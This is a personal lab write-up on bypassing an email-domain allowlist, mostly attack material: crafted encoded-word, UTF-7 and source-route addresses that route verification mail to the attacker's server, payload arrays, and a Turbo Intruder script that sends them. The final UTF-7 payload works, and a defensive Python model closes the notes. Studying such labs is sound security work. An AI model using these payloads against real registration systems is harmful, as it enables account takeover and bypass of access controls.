Lab: Bypassing access controls using email address parsing discrepancies
Here is my step-by-step for this lab, which I have not solved as of this writing; for now I only have all my tests and notes toward the solution.
We have the allowed domain, which is possibly the one that will give us access as administrator; we would have to run:
=?utf-8?b?foobar@exploit-0aca001903ace6638045342f01eb00f1.exploit-server.net?=@ginandjuice.shop
Zm9vYmFyQGV4cGxvaXQtMGFjYTAwMTkwM2FjZTY2MzgwNDUzNDJmMDFlYjAwZjEuZXhwbG9pdC1zZXJ2ZXIubmV0
Then we substitute in our exploit email address encoded as base64 →
=?utf-8?b?Zm9vYmFyQGV4cGxvaXQtMGFjYTAwMTkwM2FjZTY2MzgwNDUzNDJmMDFlYjAwZjEuZXhwbG9pdC1zZXJ2ZXIubmV0?=@ginandjuice.shop
=?x?q?YXR0YWNrZXI==40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?x?q?a+ACMtd-acker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?q?YXR0YWNrZXI==40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?b?YXR0YWNrZXI==40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?q?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?b?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?x?q?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?x?q?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop # blocked for security reasons.
=?utf-8?q?foo=40ginandjuice.shop=3e=00?=attacker@exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net
## this one below successfully registered this email for me:
attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net@ginandjuice.shop
## but it did not reach my exploit server -> let's try the archaic method called source routes ->
collab%psres.net(@example.com ## example
attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net(@ginandjuice.shop # the parenthesis caused me problems
attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net@ginandjuice.shop # this could be the one, it still needs refining.
=?x?q?attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=@ginandjuice.shop # this could be the one, it still needs refining.
=?utf-8?q?attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
admin%ginandjuice.shop@exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net # with this one it told me that only emails with the juiceand.. domain were allowed.
oastify.com!collab\@example.com # let's try this one.
exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net!attacker\@ginandjuice.shop
attacker%exploit-0aae00f404b478868139472901540007.exploit-server.net@ginandjuice.shop # the email is sent but it does not reach my server.
@ginandjuice.shop:attacker@exploit-0a0b00fb047fb9e7821f550f01a600f8.exploit-server.net
"=?utf-8?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net_?="@ginandjuice.shop
=?utf-8?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net_?=@ginandjuice.shop
=?x?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=20?=foo@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=20?=foo@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=00?=admin@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=00?=administrator@ginandjuice.shop
=?x?q?$attacker=40exploit-0af0000204c9a2be814844be01960080.exploit-server.net=3e=1f?=foo@ginandjuice.shop
=?x?q?attacker=40exploit-0af0000204c9a2be814844be01960080.exploit-server.net=3e=1f?=foo@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0af0000204c9a2be814844be01960080.exploit-server.net=3e=1c?=foo@ginandjuice.shop
=?utf-8?b?YXR0YWNrZXI=?=@exploit-0a8b00ad03f9b612815b5692014700b5.exploit-server.net
=?utf-8?b?YXR0YWNrZXI=?=@ginandjuice.shop
RCPT TO:<"attacker@exploit-0a8b00ad03f9b612815b5692014700b5.exploit-server.net>attacker"@ginandjuice.shop>
Pedro@[10.11.12.13]
attacker%exploit-0ae4000104992d2c80faa268014000fe.exploit-server.net%mail.mit.edu@ginandjuice.shop # this one also sends the registration email, yet nothing reaches my exploit server.
payloads = ["=?x?q?$collab1=40$collabServer=3e=00?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=01?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=02?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=03?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=04?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=05?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=07?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=08?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=0e?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=0f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=10?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=11?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=13?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=15?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=16?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=17?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=19?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1a?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=1b?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=1c?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1d?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=1f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=20?=foo@$validServer", "=?x?q?$collab1=40$collabServer=2c?=x@$validServer",
"=?utf7?q?$collab1&AEA-$collabServer&ACw-?=x@$validServer","=?utf7?q?$collab1&AEA-$collabServer&ACw=/xyz!-?=x@$validServer",
"=?utf7?q?$collab1=26AEA-$collabServer=26ACw-?=x@$validServer","$collab1=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer","$collab1=?x?b?QA==?=$collabServer=?x?b?LA==?=x@$validServer"
]
payloads = ["=?x?q?attacker=40$collabServer=3e=00?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=01?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=02?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=03?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=04?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=05?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=07?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=08?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=0e?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=0f?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=10?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=11?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=13?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=15?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=16?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=17?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=19?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=1a?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=1b?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=1c?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=1d?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=1f?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=20?=foo@$validServer", "=?x?q?attacker=40$collabServer=2c?=x@$validServer",
"=?utf7?q?attacker&AEA-$collabServer&ACw-?=x@$validServer","=?utf7?q?attacker&AEA-$collabServer&ACw-/xyz!-?=x@$validServer",
"=?utf7?q?attacker=26AEA-$collabServer=26ACw-?=x@$validServer","attacker=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer","attacker=?x?b?QA==?=$collabServer=?x?b?LA==?=x@$validServer"
]
In this updated array, all instances of "$collab1" have been replaced with "attacker", as requested.
payloads = [
"=?iso-8859-1?q?attacker=40$collabServer=3e=00?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=01?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=02?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=03?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=04?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=05?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=07?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=08?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=0e?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=0f?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=10?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=11?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=13?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=15?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=16?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=17?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=19?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=1a?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=1b?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=1c?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=1d?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=1f?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=3e=20?=foo@$validServer",
"=?iso-8859-1?q?attacker=40$collabServer=2c?=x@$validServer",
"=?utf7?q?attacker&AEA-$collabServer&ACw-?=x@$validServer",
"=?utf7?q?attacker&AEA-$collabServer&ACw-/xyz!-?=x@$validServer",
"=?utf7?q?attacker=26AEA-$collabServer=26ACw-?=x@$validServer",
"attacker=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer",
"attacker=?iso-8859-1?b?QA==?=$collabServer=?iso-8859-1?b?LA==?=x@$validServer"
]
payloads = [
"=?utf-8?q?attacker=40$collabServer=3e=00?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=01?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=02?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=03?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=04?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=05?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=07?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=08?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=0e?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=0f?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=10?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=11?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=13?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=15?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=16?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=17?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=19?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=1a?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=1b?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=1c?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=1d?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=1f?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=3e=20?=foo@$validServer",
"=?utf-8?q?attacker=40$collabServer=2c?=x@$validServer",
"=?utf7?q?attacker&AEA-$collabServer&ACw-?=x@$validServer",
"=?utf7?q?attacker&AEA-$collabServer&ACw-/xyz!-?=x@$validServer",
"=?utf7?q?attacker=26AEA-$collabServer=26ACw-?=x@$validServer",
"attacker=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer",
"attacker=?utf-8?b?QA==?=$collabServer=?utf-8?b?LA==?=x@$validServer"
]
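# Turbo Intruder script (Jython / Python 2); Burp supplies callbacks, RequestEngine and table.
import base64
import time
import urllib
# Delays, in seconds, between queued requests and between Collaborator polls.
REQUEST_SLEEP = 10
COLLAB_SLEEP = 10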
payloads = ["=?x?q?$collab1=40$collabServer=3e=00?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=01?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=02?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=03?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=04?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=05?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=07?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=08?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=0e?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=0f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=10?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=11?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=13?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=15?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=16?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=17?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=19?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1a?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=1b?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=1c?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1d?=foo@$validServer",
"=?x?q?$collab1=40$collabServer=3e=1f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=20?=foo@$validServer", "=?x?q?$collab1=40$collabServer=2c?=x@$validServer",
"=?utf7?q?$collab1&AEA-$collabServer&ACw-?=x@$validServer","=?utf7?q?$collab1&AEA-$collabServer&ACw=/xyz!-?=x@$validServer",
"=?utf7?q?$collab1=26AEA-$collabServer=26ACw-?=x@$validServer","$collab1=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer","$collab1=?x?b?QA==?=$collabServer=?x?b?LA==?=x@$validServer"
]
invalidServer = "blah.blah"
validServer = "exploit-0ac10009032e98f58073da2801a2008a.exploit-server.net"
shouldUrlEncode = False
collab = callbacks.createBurpCollaboratorClientContext()
collabServer = collab.getCollaboratorServerLocation()
#collabServer = "lazcacv8hjr9pygcnlmzb8d5xw3nrdf2.oastify.com"
mappings = {}
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=100,
                           pipeline=False,
                           maxRetriesPerRequest=3
                           )
    # Queue one request per payload template, pausing between requests.
    for payload in payloads:
        if "$hex" in payload:
            generateHex(0, 255, payload, engine)
        else:
            manipulated = replacePayload(payload)
            engine.queue(target.req, urllib.quote_plus(manipulated) if shouldUrlEncode else manipulated)
            time.sleep(REQUEST_SLEEP)
    print "Waiting for interactions..."
    # Poll Collaborator; the counter resets whenever new interactions arrive.
    counter = 0
    while counter < 10 and engine.engine.attackState.get() < 3:
        found = fetchInteractions(collab)
        print "Found " + str(found) + " interactions"
        time.sleep(COLLAB_SLEEP)
        counter += 1
        if found > 0:
            counter = 0
    print "Completed"

def replacePayload(payload):
    # Fill in the template placeholders and remember which payload used which Collaborator id.
    id1 = collab.generatePayload(False)
    id2 = collab.generatePayload(False)
    manipulated = payload
    manipulated = manipulated.replace("$validServer", validServer)
    manipulated = manipulated.replace("$invalidServer", invalidServer)
    manipulated = manipulated.replace("$collabServer", collabServer)
    manipulated = manipulated.replace("$collab1", id1)
    manipulated = manipulated.replace("$collab2", id2)
    mappings[id1] = manipulated
    return manipulated

def generateHex(start, end, payload, engine):
    # Expand a "$hex" placeholder into every byte value from start to end.
    for chrNum in range(start, end + 1):
        manipulated = replacePayload(payload)
        manipulated = manipulated.replace("$hex", "{:02x}".format(chrNum))
        engine.queue(target.req, urllib.quote_plus(manipulated) if shouldUrlEncode else manipulated)
        time.sleep(REQUEST_SLEEP)

def fetchInteractions(collab):
    interactions = collab.fetchAllCollaboratorInteractions()
    found = interactions.size()
    for interaction in interactions:
        smtp = interaction.getProperty('conversation')
        currentInteractionId = interaction.getProperty('interaction_id')
        try:
            original_payload = mappings[currentInteractionId]
        except KeyError:
            print "failed to look up payload for interaction id "+currentInteractionId
            original_payload = 'lookup_failed'
        if smtp is None:
            print "Got DNS interaction - not reporting"
            continue
        print "Got SMTP interaction, about to report"
        # The SMTP conversation is base64-encoded; pull out the RCPT TO address.
        decoded = base64.b64decode(smtp)
        email = decoded.partition('RCPT TO:<')[2].partition('>\r\n')[0]
        print "Found interaction! " + original_payload + " with interaction " + currentInteractionId
    return found

def handleResponse(req, interesting):
    table.add(req)
=?iso-8859-1?q?juanfelipeoz.rar=40gmail.com=3e=1c?=tester@mozilla.com
rhc1n3za9qgcbmrxigrrpzb6nxtohe53.oastify.com
m8vweyq50l772his9bimgu21eskj8bw0.oastify.com
=?**iso-8859-1**?q?m8vweyq50l772his9bimgu21eskj8bw0=40oastify.com=3e=00?=foo@google.com
=?x?q?m8vweyq50l772his9bimgu21eskj8bw0=40oastify.com=3e=00?=foo@google.com
=?iso-8859-1?q?m8vweyq50l772his9bimgu21eskj8bw0=40oastify.com=3e=00?=x@google.com
## LET'S TEST
dp634o2qgr0anxxno6wgra9cw32uqke9.oastify.com
=?iso-8859-1?q?dp634o2qgr0anxxno6wgra9cw32uqke9=40oastify.com=3e=00?=z@mozilla.com
=?iso-8859-1?q?dp634o2qgr0anxxno6wgra9cw32uqke9=40oastify.com=3e=20?=z@mozilla.com
oa2epzn112ll88iy9hhrclunhen5bwzl.oastify.com
=?utf-8?b?Zm9vYmFy?=@mozilla.com
=?iso-8859-1?q?YXR0YWNrZXI==40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=admin@ginandjuice.shop
=?iso-8859-1?q?=61=74=74=61=63=6b=65=72=40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=foo@ginandjuice.shop
YXR0YWNrZXI
=?utf-8?b?YXR0YWNrZXI=40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=@ginandjuice.shop
=?iso-8859-1?b?YXR0YWNrZXI=40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=@ginandjuice.shop
ZXhwbG9pdC0wYWNmMDA4YzAzNTE3NmNlODUzODM1NDUwMTIzMDBhOS5leHBsb2l0LXNlcnZlci5uZXQ
=?iso-8859-1?b?YXR0YWNrZXI=40ZXhwbG9pdC0wYWNmMDA4YzAzNTE3NmNlODUzODM1NDUwMTIzMDBhOS5leHBsb2l0LXNlcnZlci5uZXQ=3e=00?=@ginandjuice.shop
There we go, someday I will solve this damned lab!
At last, the definitive solution to this lab was with utf-7.
Where the exploit server can be our collab or the lab's own exploit server, and ginandjuice.shop is the allowed domain that we want to bypass.
=?utf-7?q?attacker&AEA-YOUR-EXPLOIT-SERVER_ID&ACA-?=@ginandjuice.shop
And the email will automatically arrive at our server:
We will have access directly as admin, with the allowed domain that we just bypassed.
And we solved the lab:
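
Why the UTF-7 payload above passes a domain check, modelled as an added example (not part of the original notes or the lab's code): the registration check sees a string ending in @ginandjuice.shop, while a component that decodes the RFC 2047 encoded-word sees a different recipient. The decoder, the delimiter set, the host `collab.example` and all function names are assumptions for illustration; `strict_ok` is an allowlist check on the raw string that refuses such input before anything can decode it.

```python
import base64
import binascii
import re

ALLOWED_DOMAIN = "ginandjuice.shop"
ENCODED_WORD = re.compile(r"=\?([^?\s]+)\?([qQbB])\?([^?\s]*)\?=")
# Conservative syntax: no '=', '?', '%', '!', quotes, comments or control bytes.
PLAIN_ADDRESS = re.compile(r"[A-Za-z0-9._+-]{1,64}@([A-Za-z0-9.-]{1,253})")

def naive_domain_ok(addr):
    """Assumed model of the weak check: only the text after the last '@' is compared."""
    return addr.rsplit("@", 1)[-1].lower() == ALLOWED_DOMAIN

def _unshift(m):
    """Decode one UTF-7 shift sequence such as '&AEA-' (base64 of UTF-16BE)."""
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    except binascii.Error:
        return m.group(0)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-be", "replace")

def _decode_word(m):
    """Decode a single encoded-word the way a lenient mail library might (assumption)."""
    charset, enc, text = m.group(1).lower(), m.group(2).lower(), m.group(3)
    if enc == "b":
        try:
            text = base64.b64decode(text + "=" * (-len(text) % 4)).decode("latin-1")
        except binascii.Error:
            return m.group(0)
    else:  # Q-encoding: '_' is a space, '=XX' is a hex byte
        text = re.sub(r"=([0-9A-Fa-f]{2})", lambda h: chr(int(h.group(1), 16)),
                      text.replace("_", " "))
    if charset in ("utf-7", "utf7"):
        text = re.sub(r"[&+]([A-Za-z0-9+/]*)-", _unshift, text)
    return text

def effective_recipient(addr):
    """What a lenient decoder followed by a delimiter-splitting mailer would use."""
    decoded = ENCODED_WORD.sub(_decode_word, addr)
    return re.split(r"[>,\x00-\x20]", decoded, maxsplit=1)[0]

def strict_ok(addr):
    """Allowlist check on the raw string, so nothing is left to decode later."""
    m = PLAIN_ADDRESS.fullmatch(addr)
    return bool(m) and m.group(1).lower() == ALLOWED_DOMAIN

# Constructed samples in the page's formats; collab.example is a placeholder host.
SAMPLES = [
    "=?utf-7?q?attacker&AEA-collab.example&ACA-?=@ginandjuice.shop",
    "=?x?q?attacker=40collab.example=3e=00?=foo@ginandjuice.shop",
    "attacker%collab.example@ginandjuice.shop",
    "alice@ginandjuice.shop",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(naive_domain_ok(s), strict_ok(s), repr(effective_recipient(s)))
```

Any address where `naive_domain_ok` is true but `effective_recipient` does not end in the allowed domain marks a parsing discrepancy; `strict_ok` rejects all three crafted samples and accepts only the plain address.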